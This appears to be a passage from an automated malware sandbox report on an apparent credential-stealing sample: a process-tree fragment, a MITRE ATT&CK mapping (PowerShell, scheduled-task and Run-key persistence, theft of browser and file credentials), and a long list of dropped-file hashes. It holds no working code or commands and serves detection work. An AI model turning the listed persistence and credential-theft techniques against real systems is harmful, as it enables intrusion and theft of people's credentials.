- Launches sc.exe
PID:10472
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:11096
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD5f6df525fbd4a152fc282a9e0a8f8880f
SHA1fe55e0c57346f275d8d230ddf1457f1919e8885b
SHA256fa69299360c8b7ca75fc3fe700136e3d3738b4b09485a821b5f9d5247de3e066
SHA5128e382009926f073aa30ab9dd2d4f13a8cb74ec2d72182e7c138d48424820b74a13daacdff6bc6c304e00ab936c8d08417fae35048e58c2cb1822564ad2aebf3e
-
C:\Users\Admin\AppData\Local\01a4dd1d76243bf5f5723d6b01dc5ef4\Admin@TRGWVDJS_en-US\System\Process.txt
Filesize5KB
MD583b1297f9ead20db43c7e6b29e871c56
SHA111ad152f80250236f77133948721958f8b8c3e20
SHA2561bb50bb153b57917e64f8fbb30f1ed8db5f4a39fe82ac88e613c19ae32c0121e
SHA51259727b8b418f75d4ec7518e6480c4ed7b0422e39a6b28c58d4df1d909f62826d271959a4608acb443ad605320c61cb3a70daa73080bac33f37a91913383779bc
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
2.1MB
MD5b3475dea86b8d2936bf5d6bc0b4e6089
SHA14ba91964094f6fc1048020f67fb549ebf678935e
SHA2564ac0a39676edde0c991e224e77b71f96834441bdcc0474680ffa84a09bff1324
SHA512136caf3dcc4f5bdc1ae0c3416c6469a1c88a5ae0df389b547ebf755dd4bfdf933aede67305f5faedcde19dc9b75a0fd1696d9359cfacd7b6c2756a1ebcec5f19
-
Filesize
2.0MB
MD5b689eca05ca79b008387a5115c61f71b
SHA17a4cf8520f18130b4e434e536178ce67e3275edc
SHA256e9660d4168ce54a90597be7d9fb93e6f64b62b4b922beead20e06b823f15d35c
SHA51242cdc629e6eacb72bff514f2c0d5eda69a1db5192890cbd886256e6f1c48f6558eacc0b9b33c87afe65fbcb565ac834393bfbfd661e5075424c223ebeb639328
-
Filesize
2.0MB
MD51255e23ea313bb1a6e71d78b2f829262
SHA1a225deb67ab2cc828e79812b0e7a935505ca286a
SHA256f311de293f2e7fb8487bfc25da196a92c2060cb3bb41117928b80ffde70c196f
SHA512d321910628aff7c963e5f28bf6e896b83284754a90fba684f9690467cfde5f674f103f2ed06b1129329e719754b2dc1994d2da5f15f32538f9fde3da2e9f2c1d
-
Filesize
766KB
MD52903fdf791b5c089eba36c8cab5079bb
SHA18c05763c998704678ccd22bb1026d8e98a64fc9a
SHA25611577483217ab72ade0d8355c165fa033e3c0f3455b0380c3f763b82b042b88f
SHA5121133286c39fa643448c35e107e4a39928d6ea703367fe0c4b77b372ed1bd55a8f73517573516d77e46a6a2c3e15dd29a86738c357f38b4e69a04c6b25cf3746f
-
Filesize
1.3MB
MD52002fdf412315d31fcdf5b6acbcaa53c
SHA1c3d77ad74a3c01eba18fd19eda94789cdd7b9cb1
SHA256b7bec68290b285cdcec37f9558f1488c36e971aded4b995b3a45a40ddcaf00dc
SHA512197d3a32a63a1305a58f7e69764279c10807f904f6aca8125112c73908f65ba14db5e59969c664b7fede30d008bdbb8d0327462d6717fed908befef31397ad4c
-
Filesize
1.3MB
MD58a088181e84a1cbf88d37d2566f23709
SHA1eaba42269e50536799bd4c1dad235c2e280e2033
SHA256c85a7cd3cd0935337c25d43f84aa5110261e6c9095d312391256e05b2a716ff3
SHA512e5cb6aab762a6020ab3d3ff2d7bbd8b1f94eac9894cd53b3f6af7db62e1df128341c8389ab19a9f7bcf0ae3df75674b2d497fdede7c368cfece68b40abf60019
-
Filesize
8.9MB
MD5dbd46d6a4a15faed18b20be54bf49b40
SHA11d0c6f84cd93ab412d1f6889f2210b6d0302ed6e
SHA256c875012919be75070006b3967b7cedf2c5e4f1803d610dcd34ec7cd05aced4bc
SHA512bf2534b4eb3831b463558936855349f9e6d22e0ea8b2f262ea33027f4f390b142faa1d7ce323be2362f1398ece2ab368904110b0499b87a800cd337150427672
-
Filesize
603KB
MD5d77498d87e570315407c13189ab0b52f
SHA174b8464a93719b4a8117a58d09ae6c7f08df7223
SHA256312abdaa163c72939848c59992257e9de0c0ffa9b2d56fe2e3e75f42719a1d27
SHA5126be34a6c0a79b6a3de6e92ad2af1bb49960ae8e283262d7e4a5945201448650054d3459491cca2766581df8e7d39aea397ea30972b61d71e3dec922eb936c71f
-
Filesize
757KB
MD5b7d4565a9d634456b769b497ab240125
SHA1895b664866ac5fb4e6b602f1525982e69f30c9e2
SHA2568076fa4a81dc3069adfc7c9f902e6bded83edfc4131714d17f2528267789bc19
SHA512ec4e8d7a41e45cebd50310a8164fc3997c1711c914f0cbf0314ab647f334ac0cc1af597293a11f78b0d50b1aeed5c91287794b616aa13ef198552fa2fc5efe99
-
Filesize
6KB
MD57f19180e58e3bb90b07e7d60292f5723
SHA182b80b16d80670785187613353953331f1269fb2
SHA256e387a5ec4a105037402d6c5a15a487b4c5a640899dd1fe8f6424be6029bcb2ff
SHA512b4f3f2b4cd26a60f162e9ca76efb111beaed37397dc3475ed97855547765559d43ecf21d2db14ec1d36ccb435207ce40fcf5a53cec63d21c2c8571e97d9c0562
-
Filesize
1.8MB
MD5cedc7f9436b1b9716402fa8e78793a34
SHA1dc67910e3423e341ea361ef8e028d7fef88bf383
SHA256678930e17caad479eb9eb21e3e985ba87b6f83f7d0bcc10c63fd8c4eec531b2c
SHA512b6d2e7264d3f9a009363f35f650ef90d66ff52f6a0bdfe3b6260e4fd213ae24efd8bdd467492941b83a94666154083a988b9af564767e226196e2714000d1249
-
Filesize
479KB
MD5145dc550875d5ffce1b981c2fe9ad4a7
SHA1861cc422292d3140899f8b09b2f7d5dc22abc13b
SHA2569434b94ac39370d5b6dee2865dcb709d02030815a40841478882c853ab1dd860
SHA512b3e957dc9b6a5d653bde2ff600687b72011bc1488c85a5aebcb1400e671326ce5aaadfb746697ad4b8f3288f192f8fe92916491d4bfcbd546415d16704e3bf65
-
Filesize
479KB
MD525f00b7c2ff3ae44d849863c1e47b096
SHA190203d582817c0b1e0778e53ab8ef63c2505d912
SHA2560a7602edc5309eb0683609f1e54bc11052e046b2b3f61f64397526fa935d7c6d
SHA512144af31085439aabccd2502e3999de5952e58b708ccc9b8254381caf74130bec801f67a55c06614814a311b3093cdc88ebddc63508557b2157c0b15f88f23a15
-
Filesize
938KB
MD53ee5daab42c3468619bccf9667e51c61
SHA1496f5a073eb50adaace9bab1f952997899fda066
SHA25693490e599aa770814b831566b59fe3203435abe3b981cc4e056992479985823a
SHA5125bd3d46005cfcef2f483752b65e0e8d39e37bbf92c8a34c95046fbf93c33cd5ebc6651278b2ec82132e1978e50c909e923f6a118ae2ed4de6238d594820279ba
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.8MB
MD5c9aca2e3c165b48e432bfa2eca43d555
SHA105af3629dd4fdf04f601ce6badb27db46cd1035e
SHA25647f06dc10d95748e2b69c383fe15ce7302dfb45ac774c5c09874dc8f21517949
SHA512d9e41caf5d0ea035d53a622829829a80f03ad6089d7b3c36ed90c378c5e9685b3b61e1fdba47d6aed99aa69b62e74c77c6e327e930a7005cb2dcb7feda4dd694
-
Filesize
74KB
MD50749ca5951624f68d4952b23db0c5b32
SHA1a8cebe124d88c257155a9379a8566a746cacb9db
SHA25663ce3fa52bfa77df610a3ac561332931f018cdee917b8a20cd837d3ef808fadf
SHA512a94d26bf553c79d4381e28c362f53dfd4903d59a20fa9a80a5d7b934abbb8d78360bfd36f2fa7b0f2acf9d1a81467d840a41934c6393f26586719d82dd78adc3
-
Filesize
2.0MB
MD50e6169e467166202766d5e2402348946
SHA1b874e829f6d84a37dfec8eb74c6f7bbcb33ab8ad
SHA256b58e4ffd9dc9860a5d5e6ac533437ce63a9952e49973d5796d02b149bfa91286
SHA51298f2a986414631b86ab0e8d5a01f68cace5be9cb4f33c06877421253232ff1e2ae47714bc37785e8e42a82bba9ac96e60427b20ecf622be02de55ccee2badd33
-
Filesize
2.0MB
MD5a1631054560f9a603b38f5d723c85abb
SHA114bd9c134e13ce03446a949dddf72b20e0760ee8
SHA25618a043d0aada7fc01a2049b50edd44836bf85dc2fae0804fb1120722a63e335f
SHA512c2672d4aca824acf2e6fed172bd385003549ef56f2f41dc41fcfd9b1e25d216f9198a03bb23d1b718c610724b9601e1f1139efca95b15cb9560b82e29270ae80
-
Filesize
349KB
MD5f76f5a566cbb5f561d26e7aca841c723
SHA14838fd2dd9dbfcdaf2b1f11091f15a17f93c29be
SHA2560576fc3b0c9381c47a8a9443abdd195eebb34ece0adc5c6d17624ca0e914e8e3
SHA5129f574f09a4c54b8e786846297fcfad7af647eb134d8e960b078a83e982ccae2956aa6c4c1014c01c7774461e31314904cb6dfc325c7a90c3e31130838beb24c0
-
Filesize
120KB
MD583667b0cd2db01b1620d62f5bc9c0e26
SHA14c5ee2be623fd1dfad5fbc59e2ddb859d7664748
SHA2567d46c54d3f075c072ac449ce17710ec68106f741f3c99466cd0ea6b62257281e
SHA5129de9f11e1c2b778b138555ebcb70e8647453a0add2b4a20826f1710846e4a98efb90e26a9b73d2607f02699c47a9a2538055a563ac3df714a032c92ef4f97783
-
Filesize
2.3MB
MD503985b7b207e63b6bb894ea6ea78d92b
SHA10e6fc44b1f3c724e6050152d9e240a548314a6ff
SHA256793153a9262e4c280a71ea595fe49208a89766d6d344766af0abf8c32648f3e0
SHA512a2e9749c7d7c9745eb16b6976c6c208b3ce2ee524e958cf7c41d0d31a7fb761c4f66ad8320301c652ef4ea8128111ad9687e64f3944d40b933153d99ab8c272b
-
Filesize
8.2MB
MD5ad1e7ff98707aa243352dfd1b2691741
SHA1f1cf17b97a74b61afca131adf73c8910dd972c03
SHA256f46aff8388da5754b41c03455b626626fd6075674a81d877c8b47795a84776e9
SHA51281a7f624bfa8774ca1d26bcebce4ce51c1531b7cc33cbb9c47ba477ef4ebfc9aabbeac053e56e562b66aaadef46423a660af1c5b11a908c6f0d8272477d14202
-
Filesize
825KB
MD5a3c0c0b1442cdc0a2f49c2b2ae39d245
SHA16aff3d64e06955fb9ad4b19c394dcfdc212b423a
SHA256901fc44992636086f2bc958aa3bdbe2d9ac3e169fc11e0f9d92d235cc906a35a
SHA512b4bb0196ab8a960206b7f1d082eb7d94a408345a2887694d17186f3a2581e9263ddd43d099f2493ee8789ab5ebabac911ba54c069e517cfc479461b1a7bb4f20
-
Filesize
341KB
MD57700f61beca60db53658c52a05b01941
SHA1983f920ffec60b308c02cc07e0abf465c8ba965a
SHA2567e6b2664f4417f5a8f981ced5f2eef867cb72bca990fe3864d76d878ff62cf52
SHA51233e68f2b2440079a75523f69d55ebeb175f1448731d28ba1a120729df3e1612231903c5a9872ab673d629e865f60550bec52d7004417f0305e412724dc8011d4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD5f48ff9bc196aad68da3d4376c9649d9f
SHA16e322f4efcc330514595db2b0d4b9c46f0947fa9
SHA25611195c6b0d9981a94bdab08b52d714a2298e4e0bf98a613d62179bef8a701d00
SHA5126be43cbad73eeb9da4ab465a36849943692c8e6d287716bc4f429fc58944f1c387bea3016d263d86e620ed1081cd5e2b3fff3434687bcd4531ec401186acf068
-
Filesize
4.3MB
MD5cf45d2fda78f7a5c494f4bfd3908a4d1
SHA14ee153e497fc9300cb5f4d7eec784375102577c9
SHA256493b738879f439e73a1f45efa5d28241641f312da1548fe50b3185c57c3e6a34
SHA51244cdea95c01cef68674a98559b73f7befc4e7745847936074d9e84d3a46251ceb28181e9ab1eef53e4cb4a93af953cfdb558c47ae69e0db1ccfef7e6147676de
-
Filesize
8.4MB
MD5bcf10e3c07383d9400f0fa98f3f999d5
SHA1e4805106924f05cf3df4de8404f669fe873439b2
SHA25610d53d067e7e0d5f80d74f386981916aa1af108a8e40112db73c6381f2c11d43
SHA512934f52e507202e3647d1328afcb30fe183d33132c954325a1d8868df0ca03309cc4213b5964dd84f1450bc16ac22a0583afe4b4f00c2f1c3f5b6d0c499824746
-
Filesize
2.2MB
MD5832205883448ab8c689d8a434d92f80b
SHA1890c403a288c65683edbe9917b972ceb6eb7eba7
SHA256558addae67d50612acd60a02fb29d41be61999d299348df9a225e419cc9395ed
SHA5120c1b8b3776c14b78f9b7ac09627ca7762f62c63da489204f376519752b029951798c1ed24aed07cc660c5e54936c06560fda921e33a76e80ebab10ef97177973
-
Filesize
641KB
MD5cdbf8cd36924ffb81b19487746f7f18e
SHA1781190c5a979359054ce56ceef714a8f5384cfbb
SHA2560813c77df688b39f26bad0be2b3e4afde13e97d9a1ebcbdb3b1f4184218d1a57
SHA512ca43450e853b3c74808ad199abe329ac2a2d7ae2e84c17fb467374c22ec9620fb102c75889e279e2d28f0ebd14d8bafafe700241ba4141fd64b4801802a3d474
-
Filesize
536KB
MD5272a9e637adcaf30b34ea184f4852836
SHA16de8a52a565f813f8ac7362e0c8ba334b680f8f8
SHA25635b15b78c31111db4fa11d9c9cad3a6f22c92daa5e6f069dc455e72073266cc4
SHA512f1f04a84d25a74bb1cf6285ef705f092a08e93d39df569f6badc45b8722d496bbbef02b4e19f76a0332e3842945506c2c12ad61fe34f339bb91f49b8d112cd52
-
Filesize
612KB
MD543143abb001d4211fab627c136124a44
SHA1edb99760ae04bfe68aaacf34eb0287a3c10ec885
SHA256cb8928ff2faf2921b1eddc267dce1bb64e6fee4d15b68cd32588e0f3be116b03
SHA512ced96ca5d1e2573dbf21875cf98a8fcb86b5bcdca4c041680a9cb87374378e04835f02ab569d5243608c68feb2e9b30ffe39feb598f5081261a57d1ce97556a6
-
Filesize
53KB
MD545ed395023be5e7fa6cc5e0bdf5758fb
SHA11c2bce460babcce117a3bbd5ef5880e24e46d6e6
SHA256c3101b5b8ca46e0eaa1998bdde51b5a6daa83d055ce19a1495b769a77c7718db
SHA512cde6d6b3d84648cf2e46453c0d2d43e296bbebd9a2400a0dcbf92cd54f2e06e9714fbf73d8de38ac895ab4e84343d561906692865dcb2c3b13ee85eb6fafa9f8
-
Filesize
1.0MB
MD5862c18d9ae0274490abff6a542b8a3e9
SHA1591e2c15f429355ad90c18aa70845342f3b6447d
SHA2567138a648e83aaa97eb31b98c9bfc4e9ccacde6d192e4f9b517572fe11335a724
SHA5129e5c1aa5fb6a6c0947bcba2a74e3c0d8691a4309c99bfba83928eebc44468af5b4b279f538516d9ed5d55a60feb630bb1356946adaec6981a170a4cb3b1a1f2c
-
Filesize
120KB
MD578ae7e25d01042732ed1ad6c8eec7fbe
SHA1f7855ba7449d7661e374db686eea8a1db0b98f7e
SHA256283e399fe931a7d454c4a77adac024d7646c4b6634423430c2c6b11871bdc7b5
SHA512f81ebda2ba1a0c09fe3a8a3c55c26499c9b3f48d80055313a1c3de15034400d7754b5548c32e4723333c531407731af34e6abd5ca215aa3681c09385c03140ce
-
Filesize
114KB
MD5ee397aaf61a98698a7f29b173816759b
SHA16fb86529c834ee09a432384fc0b126052986c394
SHA2566b4aef8a36045f80bbbd799331f453f0058a7e9b1553e00e10faefc9432c5a04
SHA51225e0214f518bd7d8330b8dbf44f726de6f26a9840197c5beeed7a466d28538c21cb82681d6a4a99a25d5f62483e703078de5eb912a861770ce67656faeee22b0
-
Filesize
160KB
MD5f310cf1ff562ae14449e0167a3e1fe46
SHA185c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA5121196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad
-
Filesize
1005KB
MD5d3a6304c826cbed6ffb0b16521b7bd58
SHA112de4fabd7c321c80fb78a7a482ec3d000f10919
SHA25616d4e2f1a615ada3ea07676a63c74e9612a6fe1cbdc56b008e44008e336cbf25
SHA51273dc32bffbcd68cc17c004dc09d72981c6d2a581d61ae57f4a576ff98704d11e5ab7ae451e472669bd7777a336a96c42642833d95bf434e727a2b1162d171c8e
-
Filesize
9KB
MD588ef4d4683d56548fd5e1b099bbe8943
SHA1bf32525956bc49010433b8a80c682b8b4fcf9f3f
SHA256796f41a4051d36885e601e7b9a4fc79b501c41f1cad48f7c0138d44aff271dcc
SHA512e14fb19cd915d1b75f3d4477052b5c7e53157b5f1ef241cd63e79cd22ff49b8804a16167c109395befa318375b785abd85a3df6beca7eab3e9f5d20be1d8878e
-
Filesize
74KB
MD5484c9d7582a74eb6fac05b9c7e4eac44
SHA1de1bce03ce38f32866ee0f545c1a7d94748ee7cf
SHA256fb0569e9a61a133ef7382181966c3bd3e21bc32d078804edbe1eea80cde43af4
SHA51290aaf9c27267ab318ac7d7e845678c6bf742ebadf7d785d0a03cdb9fd3abd0fbb866a5672ee0da4ffd04345192e2f49d24e0d8ab502a31ba790929f9a00dee22